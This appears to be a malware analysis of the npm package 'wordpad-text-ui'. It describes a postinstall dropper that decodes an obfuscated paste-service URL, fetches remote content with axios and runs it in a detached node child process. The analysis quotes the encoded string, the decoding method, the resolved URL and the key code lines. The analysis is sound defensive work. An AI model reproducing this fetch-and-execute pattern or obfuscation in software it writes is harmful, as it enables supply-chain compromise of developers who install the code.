wordpad-text-uinpm

On npm install, the declared postinstall hook runs node main.js, which decodes an obfuscated URL (stored as DEV_API_KEY="S]EH:2e2prf1uhshhnqrvm1zzz22=vswwk" in main.js line 15, deobfuscated via string reversal and a Caesar shift of -3 to https://www.jsonkeeper.com/b/7EBZP), HTTP-GETs the response via axios, and writes the body into the stdin of a detached node child process for execution (main.js lines 18-23: const s1 = (await axios.get(update(DEV_API_KEY))).data.content; const child = spawn('node', [], { detached: true,... }); child.stdin.write(s1); child.stdin.end(); child.unref();). This is a classic install-time remote code execution dropper: the payload is hosted on an anonymous, mutable JSON paste service and is therefore attacker-controlled and can change at any time without a package update. Supporting indicators reinforce malicious intent: the C2 URL is hidden behind a homemade reverse+Caesar encoding under a misleading DEV_API_KEY name (an evasion tactic against static scanners); the package's name (wordpad-text-ui) implies a text-editor UI library but index.js only errors out telling consumers not to require it, while bootstrap.js, bundle.js, and publish.js are empty 0-byte decoys — the package ships no actual functionality and exists solely to deliver the dropper. It also pulls in a sibling package richtext-editor-ui that propagates the same campaign.